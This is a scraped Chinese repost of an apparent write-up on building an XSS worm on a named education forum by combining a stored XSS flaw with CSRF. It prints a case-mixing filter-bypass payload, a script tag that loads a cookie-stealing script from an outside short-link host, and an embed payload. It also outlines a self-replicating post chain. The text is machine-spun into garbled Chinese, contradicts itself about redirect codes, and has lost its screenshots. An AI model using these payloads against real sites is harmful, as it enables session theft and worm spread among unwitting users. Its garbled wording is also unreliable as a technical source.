加入收藏 | 设为首页 | 会员中心 | 我要投稿 河北网 (https://www.hebeiwang.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 业界 > 正文

记一次XSS蠕虫渗出尝试

发布时间:2019-01-17 22:56:34 所属栏目:业界 来源:莫妮卡k37
导读:概略思绪 在发帖的内容处发明白存储型XSS 对帖子(母贴)的内容举办结构,插入CSRF POC,并对个中内容输出为302永世重定向到母传染贴 全部赏识此页面的用户城市自动宣布一个重定向到母传染贴的子贴,重定向到母贴时又再次执行母贴中的POC再次建设一个子贴。
副问题[/!--empirenews.page--]

概略思绪

  • 在发帖的内容处发明白存储型XSS
  • 对帖子(母贴)的内容举办结构,插入CSRF POC,并对个中内容输出为302永世重定向到母传染贴
  • 全部赏识此页面的用户城市自动宣布一个重定向到母传染贴的子贴,重定向到母贴时又再次执行母贴中的POC再次建设一个子贴。

以上就是XSS+CSRF结构蠕虫概略的思绪,下面细化各个步调的进程,程度不高,得当XSS初学者的进阶。

XSS蠕虫渗出

一、存储型XSS

1.进入发帖处,添加起源测试payload,并查察源码:

记一次XSS蠕虫渗出尝试

2.调查到可以巨细写夹杂绕过,于是结构payload(对付屏障括号的可以用 ’ 来取代):

  1. <sCrIpt>alert'xss'</sCrIpt> 

记一次XSS蠕虫渗出尝试

3.革新页面调查结果,乐成弹窗:

记一次XSS蠕虫渗出尝试

4.插入JS剧本,操作XSS平台窃取用户cookie,这是最常用的XSS操作伎俩。

POC:

  1. <sCRiPt/SrC=//60.wf/m5VP> 

SRC引用的是短地点,内容为窃取用户cookie的JS剧本,具体可以行使XSS平台自动天生:

记一次XSS蠕虫渗出尝试

二、XSS共同CSRF的起源考试

1.起首验证是否存在CSRF,同样在宣布新贴处,填写问题内容,点击宣布抓包:

记一次XSS蠕虫渗出尝试

2.burp自带的天生CSRF POC,POST包处-》右键-》generate csrf poc -》生涯-》行使另一个账号发送POC,查察本身的帖子,发明乐成发送新帖。

3.编写JS剧本(可以操作Xss’or来天生)

记一次XSS蠕虫渗出尝试

4.CSRF+存储型XSS将剧本插入到页面中:

记一次XSS蠕虫渗出尝试

如图,内容为宣布新帖的JS剧本,点击宣布,就天生了新帖。

5.赏识此贴,提醒乐成:

记一次XSS蠕虫渗出尝试

6.可以看到乐成宣布出去:

记一次XSS蠕虫渗出尝试

7.行使其他用户赏识帖子测试—-发明同样不知觉的发了个新帖,至此,XSS+CSRF的进攻已经完成:

记一次XSS蠕虫渗出尝试

三、蠕虫的结构

再清算一下思绪。

蠕虫的条件是子贴的内容,即点击我们母传染贴的用户所宣布的子贴的内容是可控的:

1.进攻者建设一个进攻帖(母帖),贴中JS剧本包括:​ ①建设一个子回传帖​ ②子回传帖的内容是重定向到母帖​2.用户赏识母帖,然后自动建设一个子回传帖;3.子回传帖403重定向到母帖;​4.按照内容又建设一个子回传帖;​5.用户之间相互赏识,发散,撒播,不拉不拉不拉,造成蠕虫进攻。

1.恣意颁发新帖:

记一次XSS蠕虫渗出尝试

2.记录帖子的URL并点击编辑:

记一次XSS蠕虫渗出尝试

3.插入JS剧本,个中节制子回传贴302重定向到母贴的URL。

payload:

  1. <embed/src=/bang.duia.com/web/normal/topic/806440> 

意为在页面中插入一个新页面,这个新页面为母贴。

记一次XSS蠕虫渗出尝试

4.宣布后赏识,已天生子回传贴:

记一次XSS蠕虫渗出尝试

(编辑:河北网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

热点阅读